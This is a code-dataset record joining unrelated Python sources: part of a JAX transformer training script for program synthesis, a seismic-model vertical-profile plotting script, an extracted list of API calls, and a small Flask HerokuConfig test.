method=models.DecomposeAttentionTransformer.decode)
new_flat_cache = new_vars['cache']
# Remove singleton sequence-length dimension:
# [batch * beam, 1, vocab] --> [batch * beam, vocab]
flat_logits = flat_logits.squeeze(axis=1)
return flat_logits, new_flat_cache
# Using the above-defined single-step decoder function, run a
# beam search over possible sequences given input encoding.
beam_seqs, _ = decode.beam_search(
inputs,
cache,
tokens_ids_to_logits,
beam_size=beam_size,
alpha=0.6,
bos_token=config.base_config.bos_token,
eos_token=eos_token,
max_decode_len=max_decode_len,
slow_decode=slow_decode)
# Beam search returns [n_batch, n_beam, n_length] with beam dimension
# sorted in increasing order of log-probability.
return beam_seqs
# Util functions for prediction
# -----------------------------------------------------------------------------
def pad_examples(x, desired_batch_size):
"""Expand batch to desired size by repeating last slice."""
batch_pad = desired_batch_size - x.shape[0]
tile_dims = [1] * len(x.shape)
tile_dims[0] = batch_pad
return np.concatenate([x, np.tile(x[-1], tile_dims)], axis=0)
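# Editor's note: for example, pad_examples(x, 4) on an array with
# x.shape[0] == 3 tiles the last slice once, so every device receives a full
# batch during the beam-search prediction loop below.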
def tohost(x):
"""Collect batches from all devices to host and flatten batch dimensions."""
n_device, n_batch, *remaining_dims = x.shape
return x.reshape((n_device * n_batch,) + tuple(remaining_dims))
def per_host_sum_pmap(in_tree):
"""Execute psum on in_tree's leaves over one device per host."""
host2devices = collections.defaultdict(list)
for d in jax.devices():
host2devices[d.host_id].append(d)
devices = [host2devices[k][0] for k in host2devices]
host_psum = jax.pmap(lambda x: jax.lax.psum(x, 'i'), 'i', devices=devices)
def pre_pmap(xs):
return jax.tree_map(lambda x: jnp.broadcast_to(x, (1,) + x.shape), xs)
def post_pmap(xs):
return jax.tree_map(lambda x: x[0], xs)
return post_pmap(host_psum(pre_pmap(in_tree)))
def eval_predicted(predicted, inputs, outputs, parse_beam_fn):
"""Evaluate predicted program beams."""
best_p, best_score = None, -1
# predicted shape [beam_size, length]
for beam in predicted[::-1]:
try:
p = parse_beam_fn(beam)
p_outs = [p(inp) for inp in inputs]
score = np.sum([p_out == out for p_out, out in zip(p_outs, outputs)])
if score > best_score:
best_p, best_score = p, score
except: # pylint: disable=bare-except
pass
if best_score >= len(inputs): # Found solution.
break
return best_p, best_score
def shorten(key):
splits = key.split('_')
return ''.join(s[0] for s in splits)
def main(_):
tf.enable_v2_behavior()
tf.random.set_seed(FLAGS.seed)
np.random.seed(FLAGS.seed)
random.seed(FLAGS.seed)
# BOS special attention only makes sense if we are using relative attention
# and it's not the baseline.
if FLAGS.bos_special_attention and (not FLAGS.use_relative_attention or
FLAGS.attention_mask_type == 'baseline'):
raise ValueError(
"bos_special_attention doesn't work when use_relative_attention={} and "
'attention_mask_type={}'.format(FLAGS.use_relative_attention,
FLAGS.attention_mask_type))
if not gfile.isdir(FLAGS.save_dir):
gfile.makedirs(FLAGS.save_dir)
hparam_str_dict = dict(seed=FLAGS.seed, lr=FLAGS.lr)
  # Get hyperparameters
if FLAGS.xm_parameters:
for key, value in json.loads(FLAGS.xm_parameters).items():
if key not in hparam_str_dict:
hparam_str_dict[key] = value
hparam_str = ','.join(['%s=%s' % (shorten(k), str(hparam_str_dict[k]))
for k in sorted(hparam_str_dict.keys())])
# Number of local devices for this host.
n_devices = jax.local_device_count()
if jax.host_id() == 0:
summary_writer = tensorboard.SummaryWriter(
os.path.join(FLAGS.save_dir, 'tb', hparam_str))
batch_size = FLAGS.per_device_batch_size * n_devices
io_shape = (FLAGS.per_device_batch_size,
FLAGS.num_strings_per_task,
FLAGS.max_characters)
program_shape = (FLAGS.per_device_batch_size, FLAGS.max_program_length)
# Setup DSL
# ---------------------------------------------------------------------------
# Build token tables.
id_char_table = {i+1: char for (i, char) in enumerate(dsl.CHARACTER)}
char_id_table = {char: id for id, char in id_char_table.items()}
id_token_table, token_id_table = dsl_tokens.build_token_tables()
io_vocab_size = len(char_id_table) + 1 # For padding.
program_vocab_size = len(token_id_table) + 1
bos_token = token_id_table[dsl.BOS]
eos_token = token_id_table[dsl.EOS]
# Parse io and program token sequences (for eval).
def decode_io(inputs, outputs):
"""Decode io examples tokens."""
def decode_str(s):
"""Decode string tokens."""
return ''.join([id_char_table[c_id] for c_id in s if c_id > 0])
inps, outs = [], []
for inp, out in zip(inputs, outputs):
inps.append(decode_str(inp))
outs.append(decode_str(out))
return inps, outs
def decode_program(program):
"""Decode program tokens."""
program = program[:np.argmax(program == eos_token) + 1].astype(np.int32)
program = program[program != bos_token]
try:
return dsl.decode_program(program.tolist(), id_token_table)
except: # pylint: disable=bare-except
return None # Program does not compile.
# Load Dataset
# ---------------------------------------------------------------------------
logging.info('Initializing dataset.')
if not FLAGS.dataset_filepattern:
raise ValueError('Must specify filepattern to dataset.')
# Training dataset.
logging.info('Loading dataset from %s', FLAGS.dataset_filepattern)
padded_shapes = (io_shape[1:], io_shape[1:], program_shape[1:])
logging.info('padded_shapes: %s', padded_shapes)
dataset = input_pipeline.create_dataset_from_tf_record(
FLAGS.dataset_filepattern, token_id_table, char_id_table)
dataset = dataset.padded_batch(
batch_size,
padded_shapes=padded_shapes,
drop_remainder=True)
# Split evaluation and training.
eval_ds = dataset.take(FLAGS.num_eval_steps)
# Decrease batch of predict dataset to handle beam search.
predict_ds = eval_ds.unbatch().padded_batch(
int(np.ceil(batch_size / 10)),
padded_shapes=padded_shapes)
train_ds = dataset.skip(FLAGS.num_eval_steps).repeat()
train_iter = train_ds.as_numpy_iterator()
# Build Model and Optimizer
# ---------------------------------------------------------------------------
use_dropout = False
base_config = base_models.TransformerConfig(
vocab_size=io_vocab_size,
output_vocab_size=program_vocab_size,
shift=True,
emb_dim=FLAGS.embedding_dim,
num_heads=FLAGS.num_heads,
num_layers=FLAGS.num_layers,
qkv_dim=FLAGS.embedding_dim,
mlp_dim=FLAGS.hidden_dim,
max_len=max(FLAGS.max_characters, FLAGS.max_program_length),
use_relative_attention=FLAGS.use_relative_attention,
deterministic=not use_dropout,
decode=False,
bos_token=bos_token)
train_config = models.DecomposeAttentionTransformerConfig(
base_config=base_config,
attention_mask_type=FLAGS.attention_mask_type,
bos_special_attention=FLAGS.bos_special_attention)
eval_config = models.DecomposeAttentionTransformerConfig(
base_config=base_config.replace(deterministic=not use_dropout),
attention_mask_type=FLAGS.attention_mask_type,
bos_special_attention=FLAGS.bos_special_attention)
predict_config = models.DecomposeAttentionTransformerConfig(
base_config=base_config.replace(
shift=False, deterministic=not use_dropout,
decode=not FLAGS.slow_decode),
attention_mask_type=FLAGS.attention_mask_type,
bos_special_attention=FLAGS.bos_special_attention)
rng = jax.random.PRNGKey(FLAGS.seed)
rng = jax.random.fold_in(rng, jax.host_id())
rng, init_rng = jax.random.split(rng)
m = models.DecomposeAttentionTransformer(eval_config)
initial_variables = jax.jit(m.init)(
{'params': init_rng, 'dropout': init_rng},
jnp.ones(io_shape, jnp.float32),
jnp.ones(io_shape, jnp.float32),
jnp.ones(program_shape, jnp.float32))
optimizer_def = optim.Adam(
FLAGS.lr,
beta1=0.9,
beta2=0.98,
eps=1e-9,
weight_decay=FLAGS.weight_decay)
optimizer = optimizer_def.create(initial_variables['params'])
del initial_variables # Don't keep a copy of the initial model.
start_step = 0
if FLAGS.restore_checkpoints:
# Restore unreplicated optimizer + model state from last checkpoint.
optimizer = checkpoints.restore_checkpoint(
os.path.join(FLAGS.save_dir, 'checkpoints', hparam_str), optimizer)
# Grab last step.
start_step = int(optimizer.state.step)
logging.info('Found model checkpointed at step %d.', start_step)
if FLAGS.finetune_start_step > 0:
logging.info('Checking that start_step (%s) == finetune_start_step (%s)',
start_step, FLAGS.finetune_start_step)
assert start_step == FLAGS.finetune_start_step
# Replicate optimizer.
optimizer = jax_utils.replicate(optimizer)
# TODO(jxihong): Implement fast decoding.
assert FLAGS.slow_decode, 'Fast decoding is not implemented yet.'
if FLAGS.finetune_start_step <= 0:
learning_rate_fn = create_learning_rate_scheduler(
base_learning_rate=FLAGS.lr)
else:
# Constant LR for finetuning.
learning_rate_fn = create_learning_rate_scheduler(
base_learning_rate=FLAGS.lr,
factors='constant')
p_train_step = jax.pmap(
functools.partial(
train_step,
learning_rate_fn=learning_rate_fn,
config=train_config),
axis_name='batch')
p_eval_step = jax.pmap(
functools.partial(eval_step,
eos_token=eos_token,
config=eval_config),
axis_name='batch')
p_init_cache = jax.pmap(
functools.partial(
initialize_cache,
max_decode_len=FLAGS.max_program_length,
config=predict_config),
axis_name='batch')
p_pred_step = jax.pmap(
functools.partial(
predict_step,
eos_token=eos_token,
max_decode_len=FLAGS.max_program_length,
config=predict_config,
slow_decode=FLAGS.slow_decode),
axis_name='batch',
static_broadcasted_argnums=(4,))
# Main Train Loop
# ---------------------------------------------------------------------------
dropout_rng = jax.random.split(rng, jax.local_device_count())
del rng
metrics_all = []
tick = time.time()
for step in range(start_step, FLAGS.num_train_steps):
inputs, outputs, programs = common_utils.shard(next(train_iter))
optimizer, metrics, dropout_rng = p_train_step(
optimizer, inputs, outputs, programs, dropout_rng=dropout_rng)
metrics_all.append(metrics)
is_last_step = step == FLAGS.num_train_steps - 1
# Save a Checkpoint
if (step % FLAGS.checkpoint_freq == 0 and step > 0) or is_last_step:
if jax.host_id() == 0:
# Save unreplicated optimizer + model state.
checkpoints.save_checkpoint(
os.path.join(FLAGS.save_dir, 'checkpoints', hparam_str),
jax_utils.unreplicate(optimizer),
step)
# Periodic metric handling.
# Training Metrics
if (step and step % FLAGS.log_freq == 0) or is_last_step:
logging.info('Gathering training metrics.')
metrics_all = common_utils.get_metrics(metrics_all)
lr = metrics_all.pop('learning_rate').mean()
metrics_sums = jax.tree_map(jnp.sum, metrics_all)
denominator = metrics_sums.pop('denominator')
summary = jax.tree_map(
lambda x: x / denominator, # pylint: disable=cell-var-from-loop
metrics_sums)
summary['learning_rate'] = lr
# Calculate (clipped) perplexity after averaging log-perplexities:
summary['perplexity'] = jnp.clip(jnp.exp(summary['loss']), a_max=1.0e4)
if jax.host_id() == 0:
logging.info('Train in step: %d, loss: %.4f', step, summary['loss'])
tock = time.time()
steps_per_sec = FLAGS.log_freq / (tock - tick)
tick = tock
summary_writer.scalar('train/steps per second', steps_per_sec, step)
for key, val in summary.items():
summary_writer.scalar('train/' + key, val, step)
summary_writer.flush()
# Reset metric accumulation for next evaluation cycle.
metrics_all = []
# Evaluation Metrics
if (step and step % FLAGS.eval_freq == 0) or is_last_step:
logging.info('Gathering evaluation metrics.')
t_evaluation_start = time.time()
eval_metrics = []
for batches in eval_ds.as_numpy_iterator():
inputs, outputs, programs = common_utils.shard(batches)
metrics = p_eval_step(optimizer.target, inputs, outputs, programs)
eval_metrics.append(metrics)
eval_metrics = common_utils.get_metrics(eval_metrics)
eval_metrics_sums = jax.tree_map(jnp.sum, eval_metrics)
eval_denominator = eval_metrics_sums.pop('denominator')
eval_summary = jax.tree_map(
lambda x: x / eval_denominator, # pylint: disable=cell-var-from-loop
eval_metrics_sums)
if jax.host_id() == 0:
logging.info('Evaluation time: %.4f s step %d, loss: %.4f.',
time.time()-t_evaluation_start, step, eval_summary['loss'])
for key, val in eval_summary.items():
summary_writer.scalar('eval/' + key, val, step)
summary_writer.flush()
# Beam search metrics.
if (step and step % FLAGS.predict_freq == 0) or is_last_step:
logging.info('Gathering beam search metrics.')
for beam_size in [1, 5, 10, 20, 50]:
t_inference_start = time.time()
pred_acc = 0
pred_denominator = 0
ios, targets, predictions, top_of_beams = [], [], [], []
for batches in predict_ds.as_numpy_iterator():
pred_batch = batches
# Handle final odd-sized batch by padding instead of dropping it.
cur_pred_batch_size = pred_batch[0].shape[0]
if cur_pred_batch_size % n_devices:
padded_size = int(
np.ceil(cur_pred_batch_size / n_devices) * n_devices)
# pylint: disable=cell-var-from-loop
pred_batch = jax.tree_map(
lambda x: pad_examples(x, padded_size), pred_batch)
inputs, outputs, programs = common_utils.shard(pred_batch)
cache = (p_init_cache(inputs, outputs, programs)
if not FLAGS.slow_decode else None)
predicted = p_pred_step(optimizer.target, inputs, outputs, cache,
beam_size)
predicted = tohost(predicted)
inputs, outputs, programs = map(tohost, (inputs, outputs, programs))
pred_denominator += programs.shape[0]
for i, beams in enumerate(predicted):
inps, outs = decode_io(inputs[i], outputs[i])
p, p_score = eval_predicted(
beams, inps, outs, parse_beam_fn=decode_program)
if p_score >= len(inps):
pred_acc += 1
ios.append(' ; '.join(map(str, zip(inps, outs))))
targets.append(decode_program(programs[i]).to_string())
try:
predictions.append(p.to_string())
except: # pylint: disable=bare-except
predictions.append('Did not compile')
logging.info('ios: %s', ios[-1])
logging.info('target: %s', targets[-1])
beams_log = []
for beam in beams:
try:
beams_log.append(decode_program(beam).to_string())
except: # pylint: disable=bare-except
beams_log.append('Did not compile')
logging.info('predicted beam: %s', '\n'.join(beams_log))
top_of_beam = []
for index, beam in enumerate(beams[:-5:-1]):
try:
decoded_program = decode_program(beam).to_string()
except: # pylint: disable=bare-except
decoded_program = 'Did not compile'
top_of_beam.append('index: {}, decoded: {}, tokens: {}'.format(
index, decoded_program, beam))
top_of_beams.append('\n\n'.join(top_of_beam))
all_pred_acc, all_pred_denominator = per_host_sum_pmap(
jax.tree_map(np.array, (pred_acc, pred_denominator)))
# Record beam search results as text summaries.
message = []
for n in np.random.choice(np.arange(len(predictions)), 8):
text = (f'ios: {ios[n]}\n\ntarget: {targets[n]}\n\n'
f'predicted: {predictions[n]}\n\n'
f'top of beam:\n\n{top_of_beams[n]}\n\n')
message.append(text)
# Write to tensorboard.
if jax.host_id() == 0:
slow_or_fast = 'slow' if FLAGS.slow_decode else 'fast'
logging.info(
'Prediction time, %s (beam %d): %.4f s, step %d, score %.4f',
slow_or_fast, beam_size, time.time() - t_inference_start, step,
all_pred_acc / all_pred_denominator)
summary_writer.scalar(
'predict-{}/score-{}'.format(slow_or_fast, beam_size),
all_pred_acc / all_pred_denominator, step)
summary_writer.text('samples-{}'.format(beam_size),
'\n------\n'.join(message), step)
summary_writer.flush()
if __name__ == '__main__':
app.run(main)
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import click
import numba
def prepare_data(data_pd, parameter):
lon_set = set(data_pd["lon"])
lat_set = set(data_pd["lat"])
dep_set = set(data_pd["dep"])
lon_list = sorted(lon_set)
lat_list = sorted(lat_set)
dep_list = sorted(dep_set)
lon_mesh, lat_mesh, dep_mesh = np.meshgrid(
lon_list, lat_list, dep_list, indexing="ij")
dx, dy, dz = np.shape(lon_mesh)
value_mesh = np.zeros_like(lon_mesh)
x_mesh = np.zeros_like(lon_mesh)
y_mesh = np.zeros_like(lon_mesh)
z_mesh = np.zeros_like(lon_mesh)
r_mesh = np.zeros_like(lon_mesh)
for i in range(dx):
for j in range(dy):
for k in range(dz):
x_mesh[i, j, k], y_mesh[i, j, k], z_mesh[i, j, k], r_mesh[i, j, k] = lld2xyzr(
lat_mesh[i, j, k], lon_mesh[i, j, k], dep_mesh[i, j, k])
for index, row in data_pd.iterrows():
i = int(round((row.lon-lon_list[0])/(lon_list[1]-lon_list[0]), 0))
j = int(round((row.lat-lat_list[0])/(lat_list[1]-lat_list[0]), 0))
k = int(round((row.dep-dep_list[0])/(dep_list[1]-dep_list[0]), 0))
value_mesh[i, j, k] = row[parameter]
return x_mesh, y_mesh, z_mesh, value_mesh
def get_value(data_pd, lat, lon, dep, parameter):
return data_pd.loc[(data_pd.lat == lat) & (data_pd.lon == lon) & (data_pd.dep == dep)][parameter].values[0]
@numba.njit()
def lld2xyzr(lat, lon, dep):
R_EARTH_KM = 6371.0
r = (R_EARTH_KM-dep)/R_EARTH_KM
theta = 90-lat
phi = lon
z = r*cosd(theta)
h = r*sind(theta)
x = h*cosd(phi)
y = h*sind(phi)
return (x, y, z, r)
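# Editor's note: worked example (not in the original script). A point on the
# equator at lon=0 with dep=0 maps onto the unit sphere's x axis, and a depth
# equal to the Earth radius collapses to the origin:
#
#     lld2xyzr(0.0, 0.0, 0.0)     # ~(1.0, 0.0, 0.0, 1.0)
#     lld2xyzr(0.0, 0.0, 6371.0)  # (0.0, 0.0, 0.0, 0.0)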
@numba.njit()
def cosd(x):
return np.cos(np.deg2rad(x))
@numba.njit()
def sind(x):
return np.sin(np.deg2rad(x))
# def get_value_func(x_mesh, y_mesh, z_mesh, value_mesh):
# value_func = RegularGridInterpolator(
# (x_mesh, y_mesh, z_mesh), value_mesh, method="nearest")
# return value_func
@numba.njit()
def interp_value(lat, lon, dep, x_mesh, y_mesh, z_mesh, value_mesh):
x, y, z, _ = lld2xyzr(lat, lon, dep)
distance2 = (x_mesh-x)**2+(y_mesh-y)**2+(z_mesh-z)**2
mindistance2 = np.min(distance2)
coors = np.where(distance2 == mindistance2)
value = value_mesh[coors[0][0], coors[1][0], coors[2][0]]
return value
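# Editor's note: interp_value is a brute-force nearest-neighbour lookup: it
# computes the squared Cartesian distance from (lat, lon, dep) to every grid
# node and returns the value stored at the closest one, mirroring the
# method="nearest" behaviour of the commented-out RegularGridInterpolator
# variant above.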
def generate_vertical_profile_grids(lon_list, lat_list, dep_list, hnpts, vnpts):
lons = np.linspace(lon_list[0], lon_list[1], hnpts)
lats = np.linspace(lat_list[0], lat_list[1], hnpts)
deps = np.linspace(dep_list[0], dep_list[1], vnpts)
return lons, lats, deps
@click.command()
@click.option('--lon1', required=True, type=float, help="lon1")
@click.option('--lon2', required=True, type=float, help="lon2")
@click.option('--lat1', required=True, type=float, help="lat1")
@click.option('--lat2', required=True, type=float, help="lat2")
@click.option('--dep1', required=True, type=float, help="dep1")
@click.option('--dep2', required=True, type=float, help="dep2")
@click.option('--data', required=True, type=str, help="the pickle file")
@click.option('--parameter', required=True, type=str, help="physical parameter to plot")
@click.option('--hnpts', required=True, type=int, help="horizontal npts")
@click.option('--vnpts', required=True, type=int, help="vertical npts")
def main(lon1, lon2, lat1, lat2, dep1, dep2, data, parameter, hnpts, vnpts):
lon_list = [lon1, lon2]
lat_list = [lat1, lat2]
dep_list = [dep1, dep2]
data_pd_raw = pd.read_pickle(data)
# data_pd is too big
minlon = min(lon1, lon2)
maxlon = max(lon1, lon2)
minlat = min(lat1, lat2)
maxlat = max(lat1, lat2)
mindep = min(dep1, dep2)
maxdep = max(dep1, dep2)
data_pd = data_pd_raw.loc[(data_pd_raw.lat <= maxlat) & (
data_pd_raw.lat >= minlat) & (data_pd_raw.lon < maxlon) & (data_pd_raw.lon > minlon) & (data_pd_raw.dep >= mindep) & (data_pd_raw.dep <= maxdep)]
x_mesh, y_mesh, z_mesh, value_mesh = prepare_data(data_pd, parameter)
lons_plot, lats_plot, deps_plot = generate_vertical_profile_grids(
lon_list, lat_list, dep_list, hnpts, vnpts)
values = np.zeros((hnpts, vnpts))
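    # sample the model at every (horizontal, depth) node of the profile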
for ih in range(hnpts):
for iv in range(vnpts):
values[ih, iv] = interp_value(
lats_plot[ih], lons_plot[ih], deps_plot[iv], x_mesh, y_mesh, z_mesh, value_mesh)
# print(lats_plot[ih], lons_plot[ih], deps_plot[iv], values[ih, iv])
# plotting part
plt.figure()
mesh_plot_lat, mesh_plot_dep = np.meshgrid(
lats_plot, deps_plot, indexing="ij")
    # get vmin and vmax: round the colour limits outward to the nearest 0.01 so the colorbar ticks span the data
vmin_round = round(np.min(values), 2)
    if vmin_round < np.min(values):
vmin = vmin_round
else:
vmin = vmin_round-0.01
vmax_round = round(np.max(values), 2)
    if vmax_round > np.max(values):
vmax = vmax_round
else:
vmax = vmax_round+0.01
print(vmin, vmax, np.max(values), np.min(values), vmin_round, vmax_round)
plt.contourf(mesh_plot_lat, mesh_plot_dep,
values, 101, cmap=plt.cm.seismic_r)
v = np.arange(vmin, vmax, 0.01)
plt.colorbar(ticks=v, label="perturbation")
plt.gca().invert_yaxis()
plt.xlabel(
f"latitude(°) between (lon: {lon1}°, lat: {lat1}°) and (lon: {lon2}°, lat: {lat2}°)")
plt.ylabel("depth(km)")
plt.show()
if __name__ == "__main__":
main()
| [
"matplotlib.pyplot.ylabel",
"numpy.arange",
"pandas.read_pickle",
"matplotlib.pyplot.contourf",
"click.option",
"numpy.where",
"matplotlib.pyplot.xlabel",
"numpy.max",
"numpy.linspace",
"numpy.min",
"numpy.meshgrid",
"click.command",
"matplotlib.pyplot.gca",
"numba.njit",
"numpy.deg2rad",
"numpy.shape",
"matplotlib.pyplot.show",
"matplotlib.pyplot.colorbar",
"numpy.zeros",
"matplotlib.pyplot.figure",
"numpy.zeros_like"
] | [((1443, 1455), 'numba.njit', 'numba.njit', ([], {}), '()\n', (1453, 1455), False, 'import numba\n'), ((1691, 1703), 'numba.njit', 'numba.njit', ([], {}), '()\n', (1701, 1703), False, 'import numba\n'), ((1753, 1765), 'numba.njit', 'numba.njit', ([], {}), '()\n', (1763, 1765), False, 'import numba\n'), ((2009, 2021), 'numba.njit', 'numba.njit', ([], {}), '()\n', (2019, 2021), False, 'import numba\n'), ((2636, 2651), 'click.command', 'click.command', ([], {}), '()\n', (2649, 2651), False, 'import click\n'), ((2653, 2715), 'click.option', 'click.option', (['"""--lon1"""'], {'required': '(True)', 'type': 'float', 'help': '"""lon1"""'}), "('--lon1', required=True, type=float, help='lon1')\n", (2665, 2715), False, 'import click\n'), ((2717, 2779), 'click.option', 'click.option', (['"""--lon2"""'], {'required': '(True)', 'type': 'float', 'help': '"""lon2"""'}), "('--lon2', required=True, type=float, help='lon2')\n", (2729, 2779), False, 'import click\n'), ((2781, 2843), 'click.option', 'click.option', (['"""--lat1"""'], {'required': '(True)', 'type': 'float', 'help': '"""lat1"""'}), "('--lat1', required=True, type=float, help='lat1')\n", (2793, 2843), False, 'import click\n'), ((2845, 2907), 'click.option', 'click.option', (['"""--lat2"""'], {'required': '(True)', 'type': 'float', 'help': '"""lat2"""'}), "('--lat2', required=True, type=float, help='lat2')\n", (2857, 2907), False, 'import click\n'), ((2909, 2971), 'click.option', 'click.option', (['"""--dep1"""'], {'required': '(True)', 'type': 'float', 'help': '"""dep1"""'}), "('--dep1', required=True, type=float, help='dep1')\n", (2921, 2971), False, 'import click\n'), ((2973, 3035), 'click.option', 'click.option', (['"""--dep2"""'], {'required': '(True)', 'type': 'float', 'help': '"""dep2"""'}), "('--dep2', required=True, type=float, help='dep2')\n", (2985, 3035), False, 'import click\n'), ((3037, 3108), 'click.option', 'click.option', (['"""--data"""'], {'required': '(True)', 'type': 'str', 'help': '"""the pickle file"""'}), "('--data', required=True, type=str, help='the pickle file')\n", (3049, 3108), False, 'import click\n'), ((3110, 3203), 'click.option', 'click.option', (['"""--parameter"""'], {'required': '(True)', 'type': 'str', 'help': '"""physicial parameter to plot"""'}), "('--parameter', required=True, type=str, help=\n 'physicial parameter to plot')\n", (3122, 3203), False, 'import click\n'), ((3200, 3272), 'click.option', 'click.option', (['"""--hnpts"""'], {'required': '(True)', 'type': 'int', 'help': '"""horizontal npts"""'}), "('--hnpts', required=True, type=int, help='horizontal npts')\n", (3212, 3272), False, 'import click\n'), ((3274, 3344), 'click.option', 'click.option', (['"""--vnpts"""'], {'required': '(True)', 'type': 'int', 'help': '"""vertical npts"""'}), "('--vnpts', required=True, type=int, help='vertical npts')\n", (3286, 3344), False, 'import click\n'), ((369, 425), 'numpy.meshgrid', 'np.meshgrid', (['lon_list', 'lat_list', 'dep_list'], {'indexing': '"""ij"""'}), "(lon_list, lat_list, dep_list, indexing='ij')\n", (380, 425), True, 'import numpy as np\n'), ((452, 470), 'numpy.shape', 'np.shape', (['lon_mesh'], {}), '(lon_mesh)\n', (460, 470), True, 'import numpy as np\n'), ((488, 511), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', (501, 511), True, 'import numpy as np\n'), ((525, 548), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', (538, 548), True, 'import numpy as np\n'), ((562, 585), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', 
(575, 585), True, 'import numpy as np\n'), ((599, 622), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', (612, 622), True, 'import numpy as np\n'), ((636, 659), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', (649, 659), True, 'import numpy as np\n'), ((2209, 2226), 'numpy.min', 'np.min', (['distance2'], {}), '(distance2)\n', (2215, 2226), True, 'import numpy as np\n'), ((2239, 2274), 'numpy.where', 'np.where', (['(distance2 == mindistance2)'], {}), '(distance2 == mindistance2)\n', (2247, 2274), True, 'import numpy as np\n'), ((2448, 2492), 'numpy.linspace', 'np.linspace', (['lon_list[0]', 'lon_list[1]', 'hnpts'], {}), '(lon_list[0], lon_list[1], hnpts)\n', (2459, 2492), True, 'import numpy as np\n'), ((2504, 2548), 'numpy.linspace', 'np.linspace', (['lat_list[0]', 'lat_list[1]', 'hnpts'], {}), '(lat_list[0], lat_list[1], hnpts)\n', (2515, 2548), True, 'import numpy as np\n'), ((2560, 2604), 'numpy.linspace', 'np.linspace', (['dep_list[0]', 'dep_list[1]', 'vnpts'], {}), '(dep_list[0], dep_list[1], vnpts)\n', (2571, 2604), True, 'import numpy as np\n'), ((3524, 3544), 'pandas.read_pickle', 'pd.read_pickle', (['data'], {}), '(data)\n', (3538, 3544), True, 'import pandas as pd\n'), ((4172, 4196), 'numpy.zeros', 'np.zeros', (['(hnpts, vnpts)'], {}), '((hnpts, vnpts))\n', (4180, 4196), True, 'import numpy as np\n'), ((4503, 4515), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4513, 4515), True, 'import matplotlib.pyplot as plt\n'), ((4551, 4599), 'numpy.meshgrid', 'np.meshgrid', (['lats_plot', 'deps_plot'], {'indexing': '"""ij"""'}), "(lats_plot, deps_plot, indexing='ij')\n", (4562, 4599), True, 'import numpy as np\n'), ((5009, 5087), 'matplotlib.pyplot.contourf', 'plt.contourf', (['mesh_plot_lat', 'mesh_plot_dep', 'values', '(101)'], {'cmap': 'plt.cm.seismic_r'}), '(mesh_plot_lat, mesh_plot_dep, values, 101, cmap=plt.cm.seismic_r)\n', (5021, 5087), True, 'import matplotlib.pyplot as plt\n'), ((5114, 5141), 'numpy.arange', 'np.arange', (['vmin', 'vmax', '(0.01)'], {}), '(vmin, vmax, 0.01)\n', (5123, 5141), True, 'import numpy as np\n'), ((5146, 5189), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {'ticks': 'v', 'label': '"""perturbation"""'}), "(ticks=v, label='perturbation')\n", (5158, 5189), True, 'import matplotlib.pyplot as plt\n'), ((5223, 5329), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['f"""latitude(°) between (lon: {lon1}°, lat: {lat1}°) and (lon: {lon2}°, lat: {lat2}°)"""'], {}), "(\n f'latitude(°) between (lon: {lon1}°, lat: {lat1}°) and (lon: {lon2}°, lat: {lat2}°)'\n )\n", (5233, 5329), True, 'import matplotlib.pyplot as plt\n'), ((5333, 5356), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""depth(km)"""'], {}), "('depth(km)')\n", (5343, 5356), True, 'import matplotlib.pyplot as plt\n'), ((5361, 5371), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5369, 5371), True, 'import matplotlib.pyplot as plt\n'), ((1735, 1748), 'numpy.deg2rad', 'np.deg2rad', (['x'], {}), '(x)\n', (1745, 1748), True, 'import numpy as np\n'), ((1797, 1810), 'numpy.deg2rad', 'np.deg2rad', (['x'], {}), '(x)\n', (1807, 1810), True, 'import numpy as np\n'), ((4658, 4672), 'numpy.min', 'np.min', (['values'], {}), '(values)\n', (4664, 4672), True, 'import numpy as np\n'), ((4697, 4711), 'numpy.min', 'np.min', (['values'], {}), '(values)\n', (4703, 4711), True, 'import numpy as np\n'), ((4804, 4818), 'numpy.max', 'np.max', (['values'], {}), '(values)\n', (4810, 4818), True, 'import numpy as np\n'), ((4843, 4857), 'numpy.max', 'np.max', 
(['values'], {}), '(values)\n', (4849, 4857), True, 'import numpy as np\n'), ((4949, 4963), 'numpy.max', 'np.max', (['values'], {}), '(values)\n', (4955, 4963), True, 'import numpy as np\n'), ((4965, 4979), 'numpy.min', 'np.min', (['values'], {}), '(values)\n', (4971, 4979), True, 'import numpy as np\n'), ((5194, 5203), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (5201, 5203), True, 'import matplotlib.pyplot as plt\n')] |
from flask import Flask
from flask_appconfig import HerokuConfig
def create_sample_app():
app = Flask('testapp')
HerokuConfig(app)
return app
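# HerokuConfig is expected to map Heroku's HEROKU_POSTGRESQL_<COLOR>_URL environment
# variable onto SQLALCHEMY_DATABASE_URI, which is what this test asserts.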
def test_herokupostgres(monkeypatch):
monkeypatch.setenv('HEROKU_POSTGRESQL_ORANGE_URL', 'heroku-db-uri')
app = create_sample_app()
assert app.config['SQLALCHEMY_DATABASE_URI'] == 'heroku-db-uri'
| [
"flask_appconfig.HerokuConfig",
"flask.Flask"
] | [((102, 118), 'flask.Flask', 'Flask', (['"""testapp"""'], {}), "('testapp')\n", (107, 118), False, 'from flask import Flask\n'), ((123, 140), 'flask_appconfig.HerokuConfig', 'HerokuConfig', (['app'], {}), '(app)\n', (135, 140), False, 'from flask_appconfig import HerokuConfig\n')] |